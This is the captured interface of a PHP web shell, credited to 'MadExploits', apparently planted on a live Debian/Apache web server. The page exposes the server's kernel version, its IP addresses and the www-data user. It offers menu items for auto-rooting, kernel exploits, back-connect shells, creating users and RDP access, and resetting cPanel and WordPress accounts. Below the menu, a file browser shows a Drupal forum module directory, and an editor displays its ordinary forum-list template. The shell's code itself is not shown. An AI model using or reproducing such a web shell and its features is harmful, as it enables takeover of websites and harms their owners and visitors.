Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.222.167.85
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
forum /
[ HOME SHELL ]
Name
Size
Permission
Action
forum-icon.tpl.php
691
B
-rw-r--r--
forum-list.tpl.php
3.26
KB
-rw-r--r--
forum-rtl.css
398
B
-rw-r--r--
forum-submitted.tpl.php
711
B
-rw-r--r--
forum-topic-list.tpl.php
2.44
KB
-rw-r--r--
forum.admin.inc
11.72
KB
-rw-r--r--
forum.css
1.03
KB
-rw-r--r--
forum.info
364
B
-rw-r--r--
forum.install
13.27
KB
-rw-r--r--
forum.module
47.75
KB
-rw-r--r--
forum.pages.inc
1.01
KB
-rw-r--r--
forum.test
24.98
KB
-rw-r--r--
forums.tpl.php
550
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forum-list.tpl.php
<?php /** * @file * Displays a list of forums and containers. * * Available variables: * - $forums: An array of forums and containers to display. It is keyed to the * numeric IDs of all child forums and containers. Each $forum in $forums * contains: * - $forum->is_container: TRUE if the forum can contain other forums. FALSE * if the forum can contain only topics. * - $forum->depth: How deep the forum is in the current hierarchy. * - $forum->zebra: 'even' or 'odd' string used for row class. * - $forum->icon_class: 'default' or 'new' string used for forum icon class. * - $forum->icon_title: Text alternative for the forum icon. * - $forum->name: The name of the forum. * - $forum->link: The URL to link to this forum. * - $forum->description: The description of this forum. * - $forum->new_topics: TRUE if the forum contains unread posts. * - $forum->new_url: A URL to the forum's unread posts. * - $forum->new_text: Text for the above URL, which tells how many new posts. * - $forum->old_topics: A count of posts that have already been read. * - $forum->num_posts: The total number of posts in the forum. * - $forum->last_reply: Text representing the last time a forum was posted or * commented in. * - $forum_id: Forum ID for the current forum. Parent to all items within the * $forums array. * * @see template_preprocess_forum_list() * @see theme_forum_list() * * @ingroup themeable */ ?> <table id="forum-<?php print $forum_id; ?>"> <thead> <tr> <th><?php print t('Forum'); ?></th> <th><?php print t('Topics');?></th> <th><?php print t('Posts'); ?></th> <th><?php print t('Last post'); ?></th> </tr> </thead> <tbody> <?php foreach ($forums as $child_id => $forum): ?> <tr id="forum-list-<?php print $child_id; ?>" class="<?php print $forum->zebra; ?>"> <td <?php print $forum->is_container ? 'colspan="4" class="container"' : 'class="forum"'; ?>> <?php /* Enclose the contents of this cell with X divs, where X is the * depth this forum resides at. This will allow us to use CSS * left-margin for indenting. */ ?> <?php print str_repeat('<div class="indent">', $forum->depth); ?> <div class="icon forum-status-<?php print $forum->icon_class; ?>" title="<?php print $forum->icon_title; ?>"> <span class="element-invisible"><?php print $forum->icon_title; ?></span> </div> <div class="name"><a href="<?php print $forum->link; ?>"><?php print $forum->name; ?></a></div> <?php if ($forum->description): ?> <div class="description"><?php print $forum->description; ?></div> <?php endif; ?> <?php print str_repeat('</div>', $forum->depth); ?> </td> <?php if (!$forum->is_container): ?> <td class="topics"> <?php print $forum->num_topics ?> <?php if ($forum->new_topics): ?> <br /> <a href="<?php print $forum->new_url; ?>"><?php print $forum->new_text; ?></a> <?php endif; ?> </td> <td class="posts"><?php print $forum->num_posts ?></td> <td class="last-reply"><?php print $forum->last_reply ?></td> <?php endif; ?> </tr> <?php endforeach; ?> </tbody> </table>
Close